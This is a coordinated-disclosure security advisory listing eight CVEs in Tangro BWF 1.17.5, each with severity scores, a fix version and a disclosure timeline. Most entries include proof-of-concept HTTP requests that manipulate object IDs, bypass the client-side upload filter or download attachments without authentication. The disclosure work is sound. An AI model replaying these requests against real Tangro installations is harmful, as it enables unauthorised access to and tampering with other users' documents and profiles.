Advisory: Tangro BWF 1.17.5 Multiple Vulnerabilities
- Adding Attachments to Arbitrary Workitem (CVE-2020-26171)
- JWT without Expiration (CVE-2020-26172)
- Unauthenticated PDF Download (CVE-2020-26173)
- Upload Filetype Constraint Bypass (CVE-2020-26174)
- Profile Attributes of Other Users Writable (CVE-2020-26175)
- Unauthorised Listing of Attachments (CVE-2020-26176)
- Editing Disabled Profile Attributes (CVE-2020-26177)
- Unauthenticated Download of Workitem Attachments (CVE-2020-26178)
Detailed Security Advisories
Adding Attachments to Arbitrary Workitem (CVE-2020-26171)
Product: Tangro BWF Vendor: tangro software components GmbH (Heidelberg, Germany) Tested Version: 1.17.5 Fixed Version: 1.18.1 Vulnerability Type: Insecure Direct Object Reference CVSSv2 Severity: AV:N/AC:L/Au:S/C:N/I:P/A:N (Score 4.0) CVSSv3 Severity: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N (Score 4.3) CWE Reference: CWE-639 CVE Reference: CVE-2020-26171 Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH ### Overview The "documentId" of attachment uploads to "/api/document/attachments/upload" can be manipulated. By doing this, users can add attachments to workitems that do not belong to them. ### Proof of Concept When uploading an attachment to a document, the upload request specifies a document ID: ```` POST /api/document/attachments/upload HTTP/1.1 Host: <Tangro Host> Content-Length: 410 X-AUTH-TOKEN: "<TOKEN>" Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylayr7DbpEgYZ2lrs ------WebKitFormBoundarylayr7DbpEgYZ2lrs Content-Disposition: form-data; name="documentId" 100000000000123456 ------WebKitFormBoundarylayr7DbpEgYZ2lrs Content-Disposition: form-data; name="file"; filename="file.txt" Content-Type: text/plain test ------WebKitFormBoundarylayr7DbpEgYZ2lrs Content-Disposition: form-data; name="archiveObject" /SSC/CSV ------WebKitFormBoundarylayr7DbpEgYZ2lrs-- ```` By manipulating the documentID, the file will be added to the document that has been specified. ### Remediation In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.
JWT without Expiration (CVE-2020-26172)
Product: Tangro BWF Vendor: tangro software components GmbH (Heidelberg, Germany) Tested Version: 1.17.5 Fixed Version: 1.18.1 Vulnerability Type: Session Fixation CVSSv2 Severity: AV:N/AC:H/Au:N/C:P/I:P/A:N (Score 4.0) CVSSv3 Severity: AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N (Score 4.2) CWE Reference: CWE-294 CVE Reference: CVE-2020-26172 Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH ### Overview Every login in Tangro generates the same JWT token, which allows an attacker to reuse the token when a session is active. The JWT token does not contain an expiration timestamp which enables an attacker to bypass the authentication using capture-replay. ### Proof of Concept ``` Headers = { "typ" : "JWT", "alg" : "HS256" } Payload = { "lastName" : "<LastName>", "firstName" : "<FirstName>", "isSapUser" : false, "person" : "1234", "validPassword" : true, "fullName" : "<FullName>", "language" : "DE", "username" : "<Username>" } Signature = "<Signature>" ``` ### Remediation In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.
Unauthenticated PDF Download (CVE-2020-26173)
Product: Tangro BWF Vendor: tangro software components GmbH (Heidelberg, Germany) Tested Version: 1.17.5 Fixed Version: 1.18.1 Vulnerability Type: Incorrect Access Control CVSSv2 Severity: AV:N/AC:H/Au:N/C:P/I:N/A:N (Score 2.6) CVSSv3 Severity: AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N (Score 3.1) CWE Reference: CWE-639 CVE Reference: CVE-2020-26173 Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH ### Overview PDF files of invoices are served over the "/api/pdf/<documentID>" API endpoint and secured using an additional token: https://<Tangro Hosts>/api/pdf/00000000000000123456?token=<Token> While requiring the token prevents access to the PDF files without knowing its corresponding token, the API endpoint does not verify if the user requesting the document is logged in. As a result, knowing the document’s ID and token it is possible to download the PDF without logging in. ### Remediation In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.
Upload Filetype Constraint Bypass (CVE-2020-26174)
Product: Tangro BWF Vendor: tangro software components GmbH (Heidelberg, Germany) Tested Version: 1.17.5 Fixed Version: 1.18.1 Vulnerability Type: Upload Filetype Constraint Bypass CVSSv2 Severity: AV:N/AC:L/Au:S/C:C/I:C/A:C (Score 9.0) CVSSv3 Severity: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (Score 8.8) CWE Reference: CWE-434 CVE Reference: CVE-2020-26174 Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH ### Overview The Tangro application requests a list of allowed filetypes from the server and restricts uploads to the filetypes contained in this list. However, this restriction is enforced in the browser (client-side) and can easily be circumvented. This allows an attacker to upload any file as an attachment to a workitem. In a worstcase scenario, this vulnerability could lead to remote code execution. ### Proof of Concept Request: ``` POST /api/document/attachments/upload HTTP/1.1 Host: <Tangro Host> X-AUTH-TOKEN: "<Token>" Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynhbkhkaxOGRUpaZa ------WebKitFormBoundarynhbkhkaxOGRUpaZa Content-Disposition: form-data; name="documentId" 100000000000123456 ------WebKitFormBoundarynhbkhkaxOGRUpaZa Content-Disposition: form-data; name="file"; filename="unsupportedfiletype.thinking" Content-Type: text/plain The content of the file. ------WebKitFormBoundarynhbkhkaxOGRUpaZa Content-Disposition: form-data; name="archiveObject" /SSC/CSV ------WebKitFormBoundarynhbkhkaxOGRUpaZa-- ``` Server response: ``` HTTP/1.1 200 OK Pragma: no-cache Expires: -1 Content-Type: text/plain; charset=utf-8 Cache-Control: no-cache Connection: close Date: Thu, 17 Sep 2020 09:38:48 GMT XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ``` ### Remediation In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.
Profile Attributes of Other Users Writable (CVE-2020-26175)
Product: Tangro BWF Vendor: tangro software components GmbH (Heidelberg, Germany) Tested Version: 1.17.5 Fixed Version: 1.18.1 Vulnerability Type: Insecure Direct Object Reference CVSSv2 Severity: AV:N/AC:L/Au:S/C:N/I:C/A:N (Score 6.8) CVSSv3 Severity: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N (Score 6.5) CWE Reference: CWE-639 CVE Reference: CVE-2020-26175 Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH ### Overview The value of "PERSON" in requests to /api/profile can be manipulated in order to change profile information of other users. ### Proof of Concept ``` POST /api/profile HTTP/1.1 Host: <Tangro Host> -- SNIP -- { "DESCRIPTION":"", "ADDRESS_NAME1":"<Name>", -- SNIP -- "PERSON":"1234", # By manipulating this ID, it is possible to change the profile information of other users. "BIRTHDAY":"0000-00-00", "MANDT":"XXX" ``` ### Remediation In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.
Unauthorised Listing of Attachments (CVE-2020-26176)
Product: Tangro BWF Vendor: tangro software components GmbH (Heidelberg, Germany) Tested Version: 1.17.5 Fixed Version: 1.18.1 Vulnerability Type: Insecure Direct Object Reference CVSSv2 Severity: AV:N/AC:L/Au:S/C:P/I:N/A:N (Score 4.0) CVSSv3 Severity: AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N (Score 4.3) CWE Reference: CWE-639 CVE Reference: CVE-2020-26176 Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH ### Overview No or broken access control checks exist on the "/api/document/<DocumentID>/attachments" API endpoint. Knowing a document ID, it is possible to list all the attachments of a workitem, including their respective IDs. This allows an attacker to gather valid attachment IDs for workitems that do not belong to them. ### Proof of Concept Request: ``` GET /api/document/<DocumentID>/attachments HTTP/1.0 Host: <Tangro Host> X-AUTH-TOKEN: "<Token>" ``` Response: ``` HTTP/1.0 200 OK Content-Type: application/json; charset=utf-8 Date: Thu, 17 Sep 2020 11:00:33 GMT [{"archiveDocumentId":"<AttachmentID>","archiveId":"D1","archiveObject":"/SSC/PDF","creationDate":1594764000000,"name":"","sapBusinessObject":"<SAP ID>","user":""}] ``` ### Remediation In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.
Editing Disabled Profile Attributes (CVE-2020-26177)
Product: Tangro BWF Vendor: tangro software components GmbH (Heidelberg, Germany) Tested Version: 1.17.5 Fixed Version: 1.18.1 Vulnerability Type: Incorrect Access Control CVSSv2 Severity: AV:N/AC:L/Au:S/C:N/I:P/A:N (Score 4.0) CVSSv3 Severity: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N (Score 4.3) CWE Reference: CWE-639 CVE Reference: CVE-2020-26177 Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH ### Overview A user’s profile contains some items that are greyed out and thus are not intended to be edited by regular users. However, this restriction is only applied client-side. Manipulating any of the greyed out values in requests to "/api/profile" is not prohibited server-side. ### Remediation In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.
Unauthenticated Download of Workitem Attachments (CVE-2020-26178)
Product: Tangro BWF Vendor: tangro software components GmbH (Heidelberg, Germany) Tested Version: 1.17.5 Fixed Version: 1.18.1 Vulnerability Type: Insecure Direct Object Reference CVSSv2 Severity: AV:N/AC:L/Au:N/C:P/I:N/A:N (Score 5.0) CVSSv3 Severity: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N (Score 5.3) CWE Reference: CWE-639 CVE Reference: CVE-2020-26178 Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH ### Overview Knowing an attachment ID, it is possible to download workitem attachments without being authenticated. ### Proof of Concept https://<Tangro Host>/api/document/attachment/<AttachmentID>?archiveName=D1&fileType=/SSC/PDF ### Remediation In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.
Disclosure Timeline
2020-09-17: Vulnerability discovered
2020-10-01: Vulnerability reported to vendor
2020-10-01: Vendor responded immediately
2020-10-21: Vulnerability fix implemented, software update enters QA
2020-11-04: Vulnerability fixed, software update 1.18.1 released
2020-12-17: Vulnerability disclosed
References
[1] Advisory URL: https://blog.to.com/advisory-tangro-bwf-1-17-5-multiple-vulnerabilities
[2] Tangro Website: https://www.tangro.de/
Disclaimer
The information provided in this security advisory is provided „as is“ and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on https://blog.to.com.
Copyright: Creative Commons – Attribution (by) – Version 3.0